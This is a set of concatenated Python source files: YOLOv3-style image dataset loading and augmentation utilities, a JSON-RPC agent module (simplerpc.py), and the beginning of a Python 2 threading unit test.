fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect, interp=cv2.INTER_LINEAR)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to 3x416x416, uint8 to float32
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32)
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
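# Illustrative LoadStreams usage (assumed streams.txt with one RTSP/HTTP URL per
# line); each iteration yields one letterboxed frame per stream, stacked:
#   dataset = LoadStreams('streams.txt', img_size=416)
#   for sources, imgs, imgs0, _ in dataset:
#       pass   # imgs: (n_streams, 3, H, W) float32 (fp16 if half=True) in [0, 1]; imgs0: raw BGR frames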
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, img_dir, label_dir, img_size=416, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_labels=False, cache_images=False, single_cls=False):
img_dir = str(Path(img_dir)) # os-agnostic
label_dir = str(Path(label_dir)) # os-agnostic
assert os.path.isdir(img_dir), 'Img Dir not found %s. See %s' % (img_dir, help_url)
assert os.path.isdir(label_dir), 'Label Dir not found %s. See %s' % (label_dir, help_url)
img_files = sorted(os.listdir(img_dir))
string = img_dir + "/"
self.img_files = [string+x for x in img_files]
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (img_dir, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
# Define labels
label_files = sorted(os.listdir(label_dir))
string = label_dir + "/"
self.label_files = [string+x for x in label_files]
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Read image shapes (wh)
sp = img_dir + '.shapes'  # shapefile path (assumed to be cached next to the image directory)
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
# Sort by aspect ratio
s = np.array(s, dtype=np.float64)
ar = s[:, 1] / s[:, 0] # aspect ratio
i = ar.argsort()
self.img_files = [self.img_files[j] for j in i]
self.label_files = [self.label_files[j] for j in i]
self.shapes = s[i] # wh
ar = ar[i]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / 32.).astype(np.int) * 32
# Preload labels (required for weighted CE training)
self.imgs = [None] * n
self.labels = [None] * n
if cache_labels or image_weights: # cache labels for faster training
self.labels = [np.zeros((0, 5))] * n
extract_bounding_boxes = False
create_datasubset = False
pbar = tqdm(self.label_files, desc='Caching labels')
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
for i, file in enumerate(pbar):
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * np.array([w, h, w, h]) # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Caching labels (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
nf, nm, ne, nd, n)
assert nf > 0, 'No labels found. See %s' % help_url
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.label_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
img_path = self.img_files[index]
label_path = self.label_files[index]
hyp = self.hyp
mosaic = True and self.augment # load 4 images at a time into a mosaic (only during training)
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, 'r') as f:
x = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, img_path, shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
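# Sketch of what collate_fn hands to the training loop (illustrative only): for a
# batch of B samples it returns
#   imgs   : torch.Tensor of shape (B, 3, H, W)
#   labels : torch.Tensor of shape (sum(nL_i), 6), column 0 = index of the sample
#            inside the batch, columns 1:6 = (cls, x, y, w, h) in normalized xywh
# e.g. (DataLoader arguments assumed):
#   loader = torch.utils.data.DataLoader(dataset, batch_size=16,
#                                        collate_fn=LoadImagesAndLabels.collate_fn)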
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
img_path = self.img_files[index]
img = cv2.imread(img_path) # BGR
assert img is not None, 'Image Not Found ' + img_path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r < 1 or (self.augment and (r != 1)): # always resize down, only resize up if training with augmentation
interp = cv2.INTER_LINEAR if self.augment else cv2.INTER_AREA # LINEAR for training, AREA for testing
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
x = (np.random.uniform(-1, 1, 3) * np.array([hgain, sgain, vgain]) + 1).astype(np.float32) # random gains
img_hsv = (cv2.cvtColor(img, cv2.COLOR_BGR2HSV) * x.reshape((1, 1, 3))).clip(None, 255).astype(np.uint8)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
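# Note (illustrative): augment_hsv modifies img in place; each HSV channel is
# multiplied by an independent random gain drawn from U(1 - g, 1 + g), e.g.
#   augment_hsv(img, hgain=0.014, sgain=0.68, vgain=0.36)   # gain values assumed for the sketch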
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
xc, yc = [int(random.uniform(s * 0.5, s * 1.5)) for _ in range(2)] # mosaic center x, y
img4 = np.zeros((s * 2, s * 2, 3), dtype=np.uint8) + 128 # base image with 4 tiles
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Load labels
label_path = self.label_files[index]
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, 'r') as f:
x = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
else:
labels = np.zeros((0, 5), dtype=np.float32)
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'] * 1,
translate=self.hyp['translate'] * 1,
scale=self.hyp['scale'] * 1,
shear=self.hyp['shear'] * 1,
border=-s // 2) # border to remove
return img4, labels4
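# Mosaic in brief (illustrative): four images are pasted into a 2s x 2s grey
# canvas around a random centre (xc, yc); each image keeps the part overlapping
# its quadrant, and its labels are shifted by the paste offset (padw, padh)
# before the joint random_affine warp back toward s x s, e.g.
#   img4, labels4 = load_mosaic(dataset, index=0)   # labels4 in pixel xyxy on the mosaic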
def letterbox(img, new_shape=(416, 416), color=(128, 128, 128),
auto=True, scaleFill=False, scaleup=True, interp=cv2.INTER_AREA):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = max(new_shape) / max(shape)
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=interp) # INTER_AREA is better, INTER_LINEAR is faster
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
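# Worked example for letterbox (illustrative, numbers assumed): a 720x1280 BGR
# frame with new_shape=416 and auto=True gives r = 416/1280 = 0.325, so
# new_unpad = (416, 234) and dh = (416 - 234) % 32 = 22, split into 11 px of
# grey padding above and below:
#   img, ratio, (dw, dh) = letterbox(frame, new_shape=416)   # ratio == (0.325, 0.325), (dw, dh) == (0.0, 11.0)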
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=0):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
if targets is None: # targets = [cls, xyxy]
targets = []
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
changed = (border != 0) or (M != np.eye(3)).any()
if changed:
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_AREA, borderValue=(128, 128, 128))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 4) & (h > 4) & (area / (area0 + 1e-16) > 0.2) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
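# Illustrative call (parameter values assumed): jitter the image and keep only
# the targets that survive the warp with a sensible area and aspect ratio:
#   img_aug, targets_aug = random_affine(img, targets, degrees=5, translate=0.05, scale=0.05, shear=2)
# Because M = S @ T @ R and points are transformed as xy @ M.T, a point is
# rotated/scaled first, then translated, then sheared.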
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 # + [0.25] * 4 + [0.125] * 16 + [0.0625] * 64 + [0.03125] * 256 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
mask_color = [random.randint(0, 255) for _ in range(3)]
image[ymin:ymax, xmin:xmax] = mask_color
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.90] # remove >90% obscured labels
return labels
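# Illustrative cutout usage (assumed call site inside __getitem__): paint random
# coloured rectangles over the image and drop labels that end up >90% covered:
#   labels = cutout(img, labels)   # img is modified in place, labels is filtered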
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
simplerpc.py
|
# -*- coding: utf-8 -*-
# @Author: gzliuxin
# @Email: gzliuxin@corp.netease.com
# @Date: 2017-07-12 16:56:14
import json
import time
import traceback
import uuid
from .jsonrpc import JSONRPCResponseManager, dispatcher
from .jsonrpc.jsonrpc2 import JSONRPC20Response
from .jsonrpc.exceptions import JSONRPCServerError
from .jsonrpc import six
DEBUG = False
BACKEND_UPDATE = False
class Callback(object):
"""Callback Proxy"""
WAITING, RESULT, ERROR, CANCELED = 0, 1, 2, 3
def __init__(self, rid, agent=None):
super(Callback, self).__init__()
self.rid = rid
self.agent = agent
self.result_callback = None
self.error_callback = None
self.status = self.WAITING
self.result = None
self.error = None
def on_result(self, func):
if not callable(func):
raise RuntimeError("%s should be callbale" % func)
self.result_callback = func
def on_error(self, func):
if not callable(func):
raise RuntimeError("%s should be callbale" % func)
self.error_callback = func
def rpc_result(self, data):
self.result = data
if callable(self.result_callback):
# callback function, set result as function return value
try:
self.result_callback(data)
except Exception:
traceback.print_exc()
self.status = self.RESULT
def rpc_error(self, data):
self.error = data
if callable(self.error_callback):
try:
self.error_callback(data)
except Exception:
traceback.print_exc()
self.status = self.ERROR
def cancel(self):
self.result_callback = None
self.error_callback = None
self.status = self.CANCELED
def wait(self, timeout=None):
start_time = time.time()
while True:
if not BACKEND_UPDATE:
self.agent.update()
if self.status == self.WAITING:
time.sleep(0.005)
if timeout and time.time() - start_time > timeout:
raise RpcTimeoutError(self)
else:
break
return self.result, self.error
def __str__(self):
conn = self.agent.get_connection()
return '{} (rid={}) (connection="{}")'.format(repr(self), self.rid, conn)
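# Illustrative Callback usage (not part of the original module; an agent.call()
# that returns a Callback is an assumption based on RpcAgent.format_request below):
#   cb = agent.call("Screen.getScreenSize")
#   cb.on_result(lambda size: print("screen:", size))
#   result, error = cb.wait(timeout=10)   # raises RpcTimeoutError if no response arrives in time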
class AsyncResponse(object):
def __init__(self):
self.conn = None
self.rid = None
def setup(self, conn, rid):
self.conn = conn
self.rid = rid
def result(self, result):
ret = JSONRPC20Response(_id=self.rid, result=result)
if DEBUG:
print("-->", ret)
self.conn.send(ret.json)
def error(self, error):
assert isinstance(error, Exception), "%s must be Exception" % error
data = {
"type": error.__class__.__name__,
"args": error.args,
"message": str(error),
}
ret = JSONRPC20Response(_id=self.rid, error=JSONRPCServerError(data=data)._data)
if DEBUG:
print("-->", ret)
self.conn.send(ret.json)
class RpcAgent(object):
"""docstring for RpcAgent"""
REQUEST = 0
RESPONSE = 1
def __init__(self):
super(RpcAgent, self).__init__()
self._id = six.text_type(uuid.uuid4())
self._callbacks = {}
def call(self, *args, **kwargs):
raise NotImplementedError
def get_connection(self):
raise NotImplementedError
def format_request(self, func, *args, **kwargs):
rid = self._id
payload = {
"method": func,
"params": args or kwargs or [],
"jsonrpc": "2.0",
"id": rid,
}
self._id = six.text_type(uuid.uuid4()) # prepare next request id
# send rpc
req = json.dumps(payload)
if DEBUG:
print("-->", req)
# init cb
cb = Callback(rid, self)
self._callbacks[rid] = cb
return req, cb
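# Example of the JSON-RPC 2.0 request produced by format_request (illustrative;
# the method name and arguments are made up):
#   req, cb = agent.format_request("add", 1, 2)
#   # req == '{"method": "add", "params": [1, 2], "jsonrpc": "2.0", "id": "<uuid4>"}'
#   # cb is a WAITING Callback registered under that id until a response arrives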
def handle_request(self, req):
res = JSONRPCResponseManager.handle(req, dispatcher).data
return res
def handle_message(self, msg, conn):
if isinstance(msg, six.binary_type):
# In Python 3, json.loads only accepts str; Python 2 had no such restriction
msg = msg.decode('utf-8')
data = json.loads(msg)
if DEBUG:
print("<--", data)
if "method" in data:
# rpc request
message_type = self.REQUEST
result = self.handle_request(msg)
if isinstance(result.get("result"), AsyncResponse):
result["result"].setup(conn, result["id"])
else:
# if DEBUG:
# print("-->", result)
conn.send(json.dumps(result))
else:
# rpc response
message_type = self.RESPONSE
result = None
# handle callback
callback = self._callbacks.pop(data["id"])
if "result" in data:
callback.rpc_result(data["result"])
elif "error" in data:
callback.rpc_error(data["error"])
else:
pass
return message_type, result
def update(self):
raise NotImplementedError
def run(self):
def _run():
while True:
self.update()
time.sleep(0.002)
if BACKEND_UPDATE:
from threading import Thread
t = Thread(target=_run, name="update")
t.daemon = True
t.start()
else:
_run()
def console_run(self, local_dict=None):
global BACKEND_UPDATE
BACKEND_UPDATE = True
self.run()
from code import InteractiveInterpreter
i = InteractiveInterpreter(local_dict)
while True:
prompt = ">>>"
try:
line = input(prompt)
except EOFError:
print("closing..")
return
i.runcode(line)
class RpcTimeoutError(Exception):
pass
class RpcConnectionError(Exception):
pass
|
test_threading.py
|
# Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose, is_jython
import random
import sys
import threading
import thread
import time
import unittest
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() * 2
if verbose:
print 'task', self.getName(), 'will run for', delay, 'sec'
self.sema.acquire()
self.mutex.acquire()
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assert_(self.nrunning.get() <= 3)
self.mutex.release()
time.sleep(delay)
if verbose:
print 'task', self.getName(), 'done'
self.mutex.acquire()
self.nrunning.dec()
self.testcase.assert_(self.nrunning.get() >= 0)
if verbose:
print self.getName(), 'is finished.', self.nrunning.get(), \
'tasks are running'
self.mutex.release()
